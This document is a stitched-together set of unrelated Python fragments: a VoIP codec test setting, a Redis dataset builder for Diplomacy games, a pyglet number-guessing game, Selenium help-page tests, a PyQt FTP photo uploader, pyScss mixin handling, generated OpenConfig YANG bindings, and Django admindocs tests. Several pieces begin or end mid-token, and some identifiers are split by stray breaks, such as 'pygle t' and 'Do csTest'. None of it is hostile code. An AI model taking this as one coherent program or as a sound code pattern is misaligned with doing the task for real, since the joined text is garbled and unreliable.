( "PESQ codec L16/16000/1 (RX side uses snd dev)", [ InstanceParam("UA1", "--max-calls=1 --add-codec L16/16000/1 --clock-rate 16000 --play-file wavs/input.16.wav --null-audio"), InstanceParam("UA2", "--max-calls=1 --add-codec L16/16000/1 --clock-rate 16000 --rec-file wavs/tmp.16.wav --auto-answer 200") ] ) if (HAS_SND_DEV == 0): test_param.skip = True pesq_threshold = 3.5
# ============================================================================== # Copyright 2019 - Philip Paquette # # NOTICE: Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # =========================================================================
===== """ Redis dataset - Populated the Redis server with the supervised games - Saves the redis database on disk for faster boot time. """ import logging import os import pickle import shutil from threading import Thread from tqdm import tqdm from diplomacy_research.models.training.memory_buffer import MemoryBuffer from diplomacy_research.models
.training.memory_buffer.expert_games import save_expert_games from diplomacy_research.proto.diplomacy_proto.game_pb2 import SavedGame as SavedGameProto from diplomacy_research.utils.process import start_redis from diplomacy_research.utils.proto import bytes_to_zlib, bytes_to_proto, read_next_bytes from diplomacy_research.settings import PROTO_DATASET_PATH, REDIS_DATASET_PATH, WORKING_DIR, \ PHASES_COUNT_DATASET_PATH, IN_PRODUCTION # Constants LOGGER = logging.getLogger(__name__) def run(**kwargs): """ Run the script - Determines if we need to build the dataset or not. """ del kwargs # Unused args if os.path.exists(REDIS_DATASET_PATH): LOGGER.info('... Dataset already exists. Skipping.') else: build() def build(): """ Building the Redis dataset """ if not os.path.exists(PROTO_DATASET_PATH): raise RuntimeError('Unable to find the proto dataset at %s' % PROTO_DATASET_PATH) # Creating output directory if it doesn't exist os.makedirs(os.path.join(WORKING_DIR, 'containers', 'redis'), exist_ok=True) # Starting the Redis server and blocking on that thread redis_thread = Thread(target=start_redis, kwargs={'save_dir': os.path.join(WORKING_DIR, 'containers'), 'log_file_path': os.devnull, 'clear': True}) redis_thread.start() # Creating a memory buffer object to save games in Redis memory_buffer = MemoryBuffer() memory_buffer.clear() # Loading the phases count dataset to get the number of games total = None if os.path.exists(PHASES_COUNT_DATASET_PATH): with open(PHASES_COUNT_DATASET_PATH, 'rb') as file: total = len(pickle.load(file)) progress_bar = tqdm(total=total) # Loading dataset and converting LOGGER.info('... Creating redis dataset.') with open(PROTO_DATASET_PATH, 'rb') as file: while True: saved_game_bytes = read_next_bytes(file) if saved_game_bytes is None: break progress_bar.update(1) saved_game_proto = bytes_to_proto(saved_game_bytes, SavedGameProto) save_expert_games(memory_buffer, [bytes_to_zlib(saved_game_bytes)], [saved_game_proto.id]) # Saving memory_buffer.save(sync=True) # Moving file redis_db_path = {True: '/work_dir/redis/saved_redis.rdb', False: os.path.join(WORKING_DIR, 'containers', 'redis', 'saved_redis.rdb')}.get(IN_PRODUCTION) shutil.move(redis_db_path, REDIS_DATASET_PATH) LOGGER.info('... Done creating redis dataset.') # Stopping Redis and thread progress_bar.close() memory_buffer.shutdown() redis_thread.join(timeout=60)
#!/usr/bin/env python3 # vim: tw=76 import kxg import random import pygle
t LOWER_BOUND, UPPER_BOUND = 0, 5000 class World(kxg.World): """ Keep track of the secret number, the range of numbers that haven't been eliminated yet, and the winner (if there is one). """ def __init__(self): super().__init__() self.number = 0 self.lower_bound = 0 self.upper_bound = 0 self.winner = 0 class Referee(kxg.Referee): """ Pick the secret number. ""
" def on_start_game(self, num_players): number = random.randint(LOWER_BOUND + 1, UPPER_BOUND - 1) self >> PickNumber(number, LOWER_BOUND, UPPER_BOUND) class PickNumber(kxg.Message): """ Pick the secret number and communicate that choice to all the clients. """ def __init__(self, number, lower_bound, upper_bound): self.number = number self.lower_bound = lower_bound self.upper_bound = upper_bound def on_check(self, world): if world.number: raise kxg.MessageCheck("number already picked") def on_execute(self, world): world.number = self.number world.lower_bound = self.lower_bound world.upper_bound = self.upper_bound class GuessNumber(kxg.Message): """ Make a guess on behalf of the given player. If the guess is right, that player wins the game. If the guess is wrong, the range of numbers that the secret number could be is narrowed accordingly. """ def __init__(self, player, guess): self.player = player self.guess = guess def on_check(self, world): pass def on_execute(self, world): if self.guess == world.number: world.winner = self.player world.end_game() elif self.guess < world.number: world.lower_bound = max(self.guess, world.lower_bound) elif self.guess > world.number: world.upper_bound = min(self.guess, world.upper_bound) class Gui: """ Manage GUI objects like the window, which exist before and after the game itself. """ def __init__(self): self.width, self.height = 600, 400 self.window = pyglet.window.Window() self.window.set_size(self.width, self.height) self.window.set_visible(True) self.label = pyglet.text.Label( "", color=(255, 255, 255, 255), font_name='Deja Vu Sans', font_size=32, x=self.width//2, y=self.height//2, anchor_x='center', anchor_y='center', ) def on_refresh_gui(self): self.window.clear() self.label.draw() class GuiActor(kxg.Actor): """ Show the players the range of numbers that haven't been eliminated yet, and allow the player to guess what the number is. """ def __init__(self): super().__init__() self.guess = None self.prompt = "{0.lower_bound} < {1} < {0.upper_bound}" def on_setup_gui(self, gui): self.gui = gui self.gui.window.set_handlers(self) def on_draw(self): self.gui.on_refresh_gui() def on_mouse_scroll(self, x, y, dx, dy): # If the user scrolls the mouse wheel, update the guess accordingly. if self.guess is None: if dy < 0: self.guess = self.world.upper_bound else: self.guess = self.world.lower_bound self.guess = sorted([ self.world.lower_bound, self.guess + dy, self.world.upper_bound, ])[1] self.on_update_prompt() def on_key_press(self, symbol, modifiers): # If the user types a number, add that digit to the guess. try: digit = int(chr(symbol)) self.guess = 10 * (self.guess or 0) + digit except ValueError: pass # If the user hits backspace, remove the last digit from the guess. if symbol == pyglet.window.key.BACKSPACE: if self.guess is not None: guess_str = str(self.guess)[:-1] self.guess = int(guess_str) if guess_str else None # If the user hits enter, guess the current number. if symbol == pyglet.window.key.ENTER: if self.guess: self >> GuessNumber(self.id, self.guess) self.guess = None self.on_update_prompt() @kxg.subscribe_to_message(PickNumber) @kxg.subscribe_to_message(GuessNumber) def on_update_prompt(self, message=None): guess_str = '???' if self.guess is None else str(self.guess) self.gui.label.text = self.prompt.format(self.world, guess_str) def on_finish_game(self): self.gui.window.pop_handlers() if self.world.winner == self.id: self.gui.label.text = "You won!" else: self.gui.label.text = "You lost!" 
class AiActor(kxg.Actor): """ Wait a random amount of time, then guess a random number within the remaining range. """ def __init__(self): super().__init__() self.reset_timer() def on_update_game(self, dt): self.timer -= dt if self.timer < 0: lower_bound = self.world.lower_bound + 1 upper_bound = self.world.upper_bound - 1 guess = random.randint(lower_bound, upper_bound) self >> GuessNumber(self.id, guess) self.reset_timer() def reset_timer(self): self.timer = random.uniform(1, 3) if __name__ == '__main__': kxg.quickstart.main(World, Referee, Gui, GuiActor, AiActor)
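# --- Hedged illustration (not part of the game module above) -------------------
# GuessNumber.on_execute narrows the open interval (lower_bound, upper_bound)
# around the secret number: a low guess can only raise the lower bound and a
# high guess can only lower the upper bound.  The standalone sketch below replays
# that rule outside of kxg; the function name and the sample values are
# assumptions for illustration only.
def narrow_bounds(lower, upper, number, guess):
    """Return the (lower, upper) interval after one wrong guess."""
    if guess < number:
        lower = max(guess, lower)
    elif guess > number:
        upper = min(guess, upper)
    return lower, upper


if __name__ == '__main__':
    bounds = (0, 5000)
    for guess in (100, 4000, 2500):
        bounds = narrow_bounds(*bounds, number=3000, guess=guess)
    assert bounds == (2500, 4000)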
from selenium_test_case import SeleniumTestCase class Do
csTest(SeleniumTestCase): def test_links_between_pages(self): self.open_path('/help') self.assert_text_present('Frequently Asked Questions') s
elf.click_and_wait('link=Terms of Service') self.assert_text_present('Terms of Service for Google Resource Finder') self.click_and_wait('link=Privacy') self.assert_text_present('Google Resource Finder Privacy Policy') self.click_and_wait('link=Help') self.assert_text_present('Frequently Asked Questions') def test_languages(self): # English (en) self.open_path('/help?lang=en') self.assert_text_present('Frequently Asked Questions') self.click_and_wait('link=Terms of Service') self.assert_text_present('Terms of Service for Google Resource Finder') self.click_and_wait('link=Privacy') self.assert_text_present('Google Resource Finder Privacy Policy') self.click_and_wait('link=Help') self.assert_text_present('Frequently Asked Questions') # Spanish (es-419) self.open_path('/help?lang=es') self.assert_text_present('Preguntas frecuentes') self.click_and_wait('link=Condiciones del servicio') self.assert_text_present( 'Condiciones del servicio del Buscador de recursos de Google') self.click_and_wait(u'link=Privacidad') self.assert_text_present( u'Pol\u00edtica de privacidad del Buscador de recursos de Google') self.click_and_wait(u'link=Ayuda') self.assert_text_present('Preguntas frecuentes') # French (fr) self.open_path('/help?lang=fr') self.assert_text_present(u'Questions fr\u00e9quentes') self.click_and_wait('link=Conditions d\'utilisation') self.assert_text_present( u'Conditions d\'utilisation de Google Resource Finder') self.click_and_wait(u'link=Confidentialit\u00e9') self.assert_text_present( u'R\u00e8gles de confidentialit\u00e9 de Google Resource Finder') self.click_and_wait(u'link=Aide') self.assert_text_present(u'Questions fr\u00e9quentes') # Kreyol (ht) self.open_path('/help?lang=ht') self.assert_text_present(u'Kesyon Div\u00e8s Moun Poze Tout Tan') self.click_and_wait(u'link=Kondisyon S\u00e8vis yo') self.assert_text_present( u'Kondisyon S\u00e8vis pou Resource Finder Google') self.click_and_wait(u'link=Vi prive') self.assert_text_present(u'Politik Resp\u00e8 Pou Moun ak ' + u'\u201cResource Finder\u201d nan Google') self.click_and_wait(u'link=Ed') self.assert_text_present(u'Kesyon Div\u00e8s Moun Poze Tout Tan')
(fil.read()).hexdigest() #print('Uploaded file %s md5=%s size_local=%s size_remote=%s' % (f, md5, size_local, size_remote)) fil.close() if size_remote != size_local: raise Exception("Sizes don't match!") def getProgress(self): # return current progress percent if self.startlen == 0: return 0.0 return float(self.startlen-len(self.fileslist))/self.startlen def updateButton(self): # update album button style: # progressbar # show activity # percent = float(self.startlen-len(self.fileslist))/self.startlen self.progress_message.emit(self.name, self.getProgress(), self.active) @pyqtSlot() def process(self): #print('START %s', self) #print('fileslist: %s' % self.fileslist) self.prepareFtp() self.i = 0 self.startlen = len(self.fileslist) self.active = True self.updateButton() while True: # get first file name #print("New load cycle by %s" % self) try: f = self.fileslist.pop(0) self.uploadFile(f) #print('sleep', self.i, len(self.fileslist), f) self.message.emit(self.i) self.updateButton() # time.sleep(2.0) # 1/(1-1) except IndexError as err: #print('upload fileslist is empty. \nGot error: %s\n' % err) break except Exception as err: #print('Fatal!!!! \nWhile uploading file "%s" got error: \n%s' % (f, err)) traceback.print_exc(file=sys.stdout) self.fileslist.append(f) time.sleep(2.0) self.prepareFtp() #print('FINISHED') #print('These file(s) were not uploaded: %s' % self.fileslist) self.active=False self.updateButton() self.finished.emit() self.fileslist = [] self.startlen = len(self.fileslist) def enqueueFiles(self, fileslist): if self.fileslist is None: self.fileslist = [] self.startlen = 0 for f in filesl
ist: if os.path.isdir(f):
subdirfiles = [os.path.join(f, i) for i in os.listdir(f)] self.enqueueFiles(subdirfiles) else: self.fileslist.append(f) self.startlen += 1 # self.fileslist.extend(fileslist) # self.startlen += len(fileslist) class AlbumButton(QPushButton): """docstring for AlbumButton""" drop_ready = pyqtSignal(bool) def __init__(self, name, ftp_login, ftp_passwd): # super(AlbumButton, self).__init__() QPushButton.__init__(self, name) self.name = name self.ftp_login = ftp_login self.ftp_passwd = ftp_passwd # self.active = False self.setStyleSheet(self.formatStyle()) self.setAcceptDrops(True) self.drop_ready.connect(self.setDropReady) # self.setToolTip('Левая кнопка - загрузить файлы\nПравая - дополнительные действия') def contextMenuEvent(self, event): menu = QMenu(self) menu.addAction('Добавить файлы к альбому', self.selectFiles) menu.show() menu.exec_(QCursor.pos()) def mousePressEvent(self, event): if event.type() in (QEvent.MouseButtonPress,) and event.button() == Qt.LeftButton: self.selectFiles() else: super().mousePressEvent(event) def setDropReady(self, ready): # print (self.name, ready) self.setProperty('dropReady', ready) self.style().unpolish(self) self.style().polish(self) # self.update() self.repaint() def dragLeaveEvent(self, event): self.drop_ready.emit(False) super().dragLeaveEvent(event) event.accept() def dragEnterEvent(self, event): self.drop_ready.emit(True) super().dragEnterEvent(event) event.accept() def dropEvent(self, event): urls = event.mimeData().urls() print (urls) self.drop_ready.emit(False) self.enqueueFilesToUpload([u.toLocalFile() for u in urls]) event.accept() def selectFiles(self): # show dialog, get list of files/dir, start uploader dialog = QFileDialog() dialog.setFileMode(QFileDialog.AnyFile) qfileslist = dialog.getOpenFileNames(self, u'Загрузка в альбом "%s"' % self.name)[0] fileslist = [str(x) for x in qfileslist] if fileslist: self.enqueueFilesToUpload(fileslist) def enqueueFilesToUpload(self, fileslist): # add fileslist (str[]) to # enqueue files to specific folder uploader album_name = self.name uploader = album_uploaders.get(album_name) if uploader is None: # start new uploader uploader = AlbumUploader() uploader.setName(album_name, self.ftp_login, self.ftp_passwd) thread = QThread(self) uploader.moveToThread(thread) thread.started.connect(uploader.process) uploader.finished.connect(thread.quit) # uploader.finished.connect(lambda: print('==FINISHED')) uploader.finished.connect(uploader.deleteLater) thread.finished.connect(thread.deleteLater) uploader.finished.connect(lambda: self.cleanAlbumUploaders(album_name)) uploader.progress_message.connect(self.updateProgressBar) # uploader.message.connect(self.text) thread.start() album_uploaders[album_name] = uploader uploader.enqueueFiles(fileslist) ### ??? 
#print('AlbumUploaders after enqueue: ', album_uploaders) def cleanAlbumUploaders(self, album_name): del album_uploaders[album_name] #print('AlbumUploaders after clean: ', album_uploaders) def formatStyle(self, percent=0.0, active=False): # format style depending on progress level low = percent-0.001 if low < 0.0 : low = 0 high = percent+0.001 if high >= 1.0 : high = 0.9999 color = "#d8d8d8" if active: color = "#ffffd8" # self.setText(self.name + ' (Загружено ' + ('%0.f' % (percent*100)) + '%)' ) # + ' %02.f' % 100*percent) style = """QPushButton {font-size: 16pt; /* background-color: #d8d8d8; */ padding: 0.5em; margin: 0.3em; background: qlineargradient(x1: 0, y1: 0, x2: 1, y2: 0, stop: 0 green, stop: %(low)s green, stop: %(high)s %(color)s, stop: 1.0 %(color)s)} QPushButton[dropReady="true"]:hover { background-color: #d8f0d8; font-weight: bold; } QPushButton:hover {background-color: #d8f0d8; /* border: solid 1px green */} """ % dict(low=low, high=high, color=color) return style def updateProgressBar(self, name, percent, active=False): #print ('Updating updateProgressBar to', percent) style = self.formatStyle(percent, active) self.setStyleSheet(style) if active: # color = "#ffffd8" self.setText(self.name + ' (Загружено ' + ('%0.f' % (percent*100)) + '%)' ) # + ' %02.f' % 100*percent) # print (style) def start_ftp(login, passwd): # starts ftp connection ftp = ftplib.FTP(settings.host, login, passwd, None, 180) ftp.encoding = 'utf-8' ftp.set_debuglevel(level=0) ftp.set_pasv(True) return ftp def get_qsettings(): '''returns QSettings with set Company and Product names''' return QSettings(settings.company, settings.product) def save_settings(login, passwd, remember): qset = get_qsettings() qset.setValue('login', login) qset.setValue('passwd', passwd) qset.setValue('remember', remember) def restore_settings(settings): qset = get_qsettings() settings.login = qset.value('login', type=str) settings.passwd = qset.value('passwd', type=str) settings.remember = qset.value('remember', type=bool
0}".format(value)) elif key in ('warn_unused', 'control_scoping'): # TODO deprecate control_scoping? or add it to compiler? if not isinstance(value, bool): raise SassError("The '{0}' @option requires a bool, not {1!r}".format(key, value)) else: raise SassError("Unknown @option: {0}".format(key)) rule.legacy_compiler_options[key] = value def _get_funct_def(self, rule, calculator, argument): funct, lpar, argstr = argument.partition('(') funct = calculator.do_glob_math(funct) funct = normalize_var(funct.strip()) argstr = argstr.strip() # Parse arguments with the argspec rule if lpar: if not argstr.endswith(')'): raise SyntaxError("Expected ')', found end of line for %s (%s)" % (funct, rule.file_and_line)) argstr = argstr[:-1].strip() else: # Whoops, no parens at all. That's like calling with no arguments. argstr = '' argspec_node = calculator.parse_expression(argstr, target='goal_argspec') return funct, argspec_node def _populate_namespace_from_call(self, name, callee_namespace, mixin, args, kwargs): # Mutation protection args = list(args) kwargs = OrderedDict(kwargs) #m_params = mixin[0] #m_defaults = mixin[1] #m_codestr = mixin[2] pristine_callee_namespace = mixin[3] callee_argspec = mixin[4] import_key = mixin[5] callee_calculator = self._make_calculator(callee_namespace) # Populate the mixin/function's namespace with its arguments for var_name, node in callee_argspec.iter_def_argspec(): if args: # If there are positional arguments left, use the first value = args.pop(0) elif var_name in kwargs: # Try keyword arguments value = kwargs.pop(var_name) elif node is not None: # OK, try the default argument. Using callee_calculator means # that default values of arguments can refer to earlier # arguments' values; yes, that is how Sass works. value = node.evaluate(callee_calculator, divide=True) else: # TODO this should raise value = Undefined() callee_namespace.set_variable(var_name, value, local_only=True) if callee_argspec.slurp: # Slurpy var gets whatever is left # TODO should preserve the order of extra kwargs sass_kwargs = [] for key, value in kwargs.items(): sass_kwargs.append((String(key[1:]), value)) callee_namespace.set_variable( callee_argspec.slurp.name, Arglist(args, sass_kwargs)) args = [] kwargs = {} elif callee_argspec.inject: # Callee namespace gets all the extra kwargs whether declared or # not for var_name, value in kwargs.items(): callee_namespace.set_variable(var_name, value, local_only=True) kwargs = {} # TODO would be nice to say where the mixin/function came from if kwargs: raise NameError("%s has no such argument %s" % (name, kwargs.keys()[0])) if args: raise NameError("%s received extra arguments: %r" % (name, args)) pristine_callee_namespace.use_import(import_key) return callee_namespace # @print_timing(10) def _at_function(self, calculator, rule, scope, block): """ Implements @mixin and @function """ if not block.argument: raise SyntaxError("%s requires a function name (%s)" % (block.directive, rule.file_and_line)) funct, argspec_node = self._get_funct_def(rule, calculator, block.argument) defaults = {} new_params = [] for var_name, default in argspec_node.iter_def_argspec(): new_params.append(var_name) if default is not None: defaults[var_name] = default # TODO a function or mixin is re-parsed every time it's called; there's # no AST for anything but expressions :( mixin = [rule.source_file, block.lineno, block.unparsed_contents, rule.namespace, argspec_node, rule.source_file] if block.directive == '@function': def _call(mixin): def __call(namespace, *args, **kwargs): 
source_file = mixin[0] lineno = mixin[1] m_codestr = mixin[2] pristine_callee_namespace = mixin[3] callee_namespace = pristine_callee_namespace.derive() # TODO CallOp converts Sass names to Python names, so we # have to convert them back to Sass names. would be nice # to avoid this back-and-forth somehow kwargs = OrderedDict( (normalize_var('$' + key), value) for (key, value) in kwargs.items()) self._populate_namespace_from_call( "Function {0}".format(funct), callee_namespace, mixin, args, kwargs) _rule = SassRule( source_file=source_file, lineno=lineno, unparsed_contents=m_codestr, namespace=callee_namespace, # rule import_key=rule.import_key, legacy_compiler_options=rule.legacy_compiler_options, options=rule.options, properties=rule.properties, extends_selectors=rule.extends_selectors, ancestry=rule.ancestry, nested=rule.nested, ) # TODO supposed to throw an error if there's a slurpy arg
# but keywords() is never called on it try: self.manage_children(_rule, scope) except SassReturn as e: return e.retval else: return Null() return __call _mixin = _call(mixin) _mixin.mixin = mixin
mixin = _mixin if block.directive == '@mixin': add = rule.namespace.set_mixin elif block.directive == '@function': add = rule.namespace.set_function # Register the mixin for every possible arity it takes if argspec_node.slurp or argspec_node.inject: add(funct, None, mixin) else: while len(new_params): add(funct, len(new_params), mixin) param = new_params.pop() if param not in defaults: break if not new_params: add(funct, 0, mixin) _at_mixin = _at_function # @print_timing(10) def _at_include(self, calculator, rule, scope, block): """ Implements @include, for @mixins """ caller_namespace = rule.namespace caller_calculator = self._make_calculator(caller_namespace) funct, caller_argspec = self._get_funct_def(rule, caller_calculator, block.argument) # Render the passed arguments, using the caller's namespace args, kwargs = caller_argspec.evaluate_call_args(caller_calculator) argc = len(args) + len(kwargs) try: mixin = caller_namespace.mixin(funct, argc) except KeyError: try: # TODO maybe? don't do this, once '...' works # Fallback to single parameter: mixin = caller_namespace.mixin(funct, 1) except KeyError: log.error("Mixin not found: %s:%d (%s)", funct, argc, rule.file_and_line, extra={'stack': True}) retur
ssType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) self.__flags = YANGDynClass( base=TypedListType( allowed_type=RestrictedClassType( base_type=six.text_type, restriction_type="dict_key", restriction_arg={ "ADDRESS_FAMILY": {}, "BACKUP": {}, "VALUE": {}, "LOCAL": {}, "SET": {}, }, ) ), is_leaf=False, yang_name="flags", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="enumeration", is_config=False, ) self.__weight = YANGDynClass( base=RestrictedClassType( base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8 ), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint8", is_config=False, ) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path() + [self._yang_name] else: return [ "network-instances", "network-instance", "protocols", "protocol", "isis", "levels", "level", "link-state-database", "lsp", "tlvs", "tlv", "mt-isn", "neighbors", "neighbor", "subTLVs", "subTLVs", "adjacency-sid", "sid", "state", ] def _get_value(self): """ Getter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32) YANG Description: Adjacency-SID value. """ return self.__value def _set_value(self, v, load=False): """ Setter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_value is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_value() directly. YANG Description: Adjacency-SID value. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="ht
tp://openco
nfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """value must be of a type compatible with uint32""", "defined-type": "uint32", "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""", } ) self.__value = t if hasattr(self, "_set"): self._set() def _unset_value(self): self.__value = YANGDynClass( base=RestrictedClassType( base_type=long, restriction_dict={"range": ["0..4294967295"]}, int_size=32, ), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="uint32", is_config=False, ) def _get_flags(self): """ Getter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration) YANG Description: Flags associated with Adj-Segment-ID. """ return self.__flags def _set_flags(self, v, load=False): """ Setter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration) If this variable is read-only (config: false) in the source YANG file, then _set_flags is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_flags() directly. YANG Description: Flags associated with Adj-Segment-ID. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=TypedListType( allowed_type=RestrictedClassType( base_type=six.text_type, restriction_type="dict_key", restriction_arg={ "ADDRESS_FAMILY": {}, "BACKUP": {}, "VALUE": {},
ngo administration</a></h1>') self.client.logout() response = self.client.get(reverse('django-admindocs-docroot'), follow=True) # Should display the login screen self.assertContains(response, '<input type="hidden" name="next" value="/admindocs/" />', html=True) def test_bookmarklets(self): response = self.client.get(reverse('django-admindocs-bookmarklets')) self.assertContains(response, '/admindocs/views/') def test_templatetag_index(self): response = self.client.get(reverse('django-admindocs-tags')) self.assertContains(response, '<h3 id="built_in-extends">extends</h3>', html=True) def test_templatefilter_index(self): response = self.client.get(reverse('django-admindocs-filters')) self.assertContains(response, '<h3 id="built_in-first">first</h3>', html=True) def test_view_index(self): response = self.client.get(reverse('django-admindocs-views-index')) self.assertContains( response, '<h3><a href="/admindocs/views/django.contrib.admindocs.views.BaseAdminDocsView/">/admindocs/</a></h3>', html=True ) self.assertContains(response, 'Views by namespace test') self.assertContains(response, 'Name: <code>test:func</code>.') def test_view_index_with_method(self): """ Views that are methods are listed correctly. """ response = self.client.get(reverse('django-admindocs-views-index')) self.assertContains( response, '<h3><a href="/admindocs/views/django.contrib.admin.sites.AdminSite.index/">/admin/</a></h3>', html=True ) def test_view_detail(self): url = reverse('django-admindocs-views-detail', args=['django.contrib.admindocs.views.BaseAdminDocsView']) response = self.client.get(url) # View docstring self.assertContains(response, 'Base view for admindocs views.') @override_settings(ROOT_URLCONF='admin_docs.namespace_urls') def test_namespaced_view_detail(self): url = reverse('django-admindocs-views-detail', args=['admin_docs.views.XViewClass']) response = self.client.get(url) self.assertContains(response, '<h1>admin_docs.views.XViewClass</h1>') def test_view_detail_illegal_import(self): url = reverse('django-admindocs-views-detail', args=['urlpatterns_reverse.nonimported_module.view']) response = self.client.get(url) self.assertEqual(response.status_code, 404) self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules) def test_view_detail_as_method(self): """ Views that are methods can be displayed. 
""" url = reverse('django-admindocs-views-detail', args=['django.contrib.admin.sites.AdminSite.index']) response = self.client.get(url) self.assertEqual(response.status_code, 200) def test_model_index(self): response = self.client.get(reverse('django-admindocs-models-index')) self.assertContains( response, '<h2 id="app-auth">Authentication and Authorization (django.contrib.auth)</h2>', html=True ) def test_template_detail(self): response = self.client.get(reverse('django-admindocs-templates', args=['admin_doc/template_detail.html'])) self.assertContains(response, '<h1>Template: "admin_doc/template_detail.html"</h1>', html=True) def test_missing_docutils(self): utils.docutils_is_available = False try: response = self.client.get(reverse('django-admindocs-docroot')) self.assertContains( response, '<h3>The admin documentation system requires Python\'s ' '<a href="http://docutils.sf.net/">docutils</a> library.</h3>', html=True ) self.assertContains(response, '<h1 id="site-name"><a href="/admin/">Django administration</a></h1>') finally: utils.docutils_is_available = True @modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'}) @override_settings(SITE_ID=None) # will restore SITE_ID after the test def test_no_sites_framework(self): """ Without the sites framework, should not access SITE_ID or Site ob
jects. Deleting settings is fine here as UserSettingsHolder is used. """ Site.objects.all().delete() del settings.S
ITE_ID response = self.client.get(reverse('django-admindocs-views-index')) self.assertContains(response, 'View documentation') @override_settings(TEMPLATES=[{ 'NAME': 'ONE', 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'APP_DIRS': True, }, { 'NAME': 'TWO', 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'APP_DIRS': True, }]) @unittest.skipUnless(utils.docutils_is_available, "no docutils installed.") class AdminDocViewWithMultipleEngines(AdminDocViewTests): def test_templatefilter_index(self): # Overridden because non-trivial TEMPLATES settings aren't supported # but the page shouldn't crash (#24125). response = self.client.get(reverse('django-admindocs-filters')) self.assertContains(response, '<title>Template filters</title>', html=True) def test_templatetag_index(self): # Overridden because non-trivial TEMPLATES settings aren't supported # but the page shouldn't crash (#24125). response = self.client.get(reverse('django-admindocs-tags')) self.assertContains(response, '<title>Template tags</title>', html=True) @unittest.skipUnless(utils.docutils_is_available, "no docutils installed.") class TestModelDetailView(TestDataMixin, AdminDocsTestCase): def setUp(self): self.client.force_login(self.superuser) with captured_stderr() as self.docutils_stderr: self.response = self.client.get(reverse('django-admindocs-models-detail', args=['admin_docs', 'Person'])) def test_method_excludes(self): """ Methods that begin with strings defined in ``django.contrib.admindocs.views.MODEL_METHODS_EXCLUDE`` shouldn't be displayed in the admin docs. """ self.assertContains(self.response, "<td>get_full_name</td>") self.assertNotContains(self.response, "<td>_get_full_name</td>") self.assertNotContains(self.response, "<td>add_image</td>") self.assertNotContains(self.response, "<td>delete_image</td>") self.assertNotContains(self.response, "<td>set_status</td>") self.assertNotContains(self.response, "<td>save_changes</td>") def test_methods_with_arguments(self): """ Methods that take arguments should also displayed. """ self.assertContains(self.response, "<h3>Methods with arguments</h3>") self.assertContains(self.response, "<td>rename_company</td>") self.assertContains(self.response, "<td>dummy_function</td>") self.assertContains(self.response, "<td>suffix_company_name</td>") def test_methods_with_arguments_display_arguments(self): """ Methods with arguments should have their arguments displayed. """ self.assertContains(self.response, "<td>new_name</td>") def test_methods_with_arguments_display_arguments_default_value(self): """ Methods with keyword arguments should have their arguments displayed. """ self.assertContains(self.response, "<td>suffix=&#39;ltd&#39;</td>") def test_methods_with_multiple_arguments_display_arguments(self): """ Methods with multiple arguments should have all their arguments displayed, but omitting 'self'. """ self.assertContains(self.response, "<td>baz, rox, *some_args, **some_kwargs</td>") def test_method_data_types(self): company = Company.objects.create(name="Django") person = Person.objects.create(first_name="Human", last_name="User", company=company) self.assertEqual(get_return_data_type(person.get_status_count.__name__), 'Integ
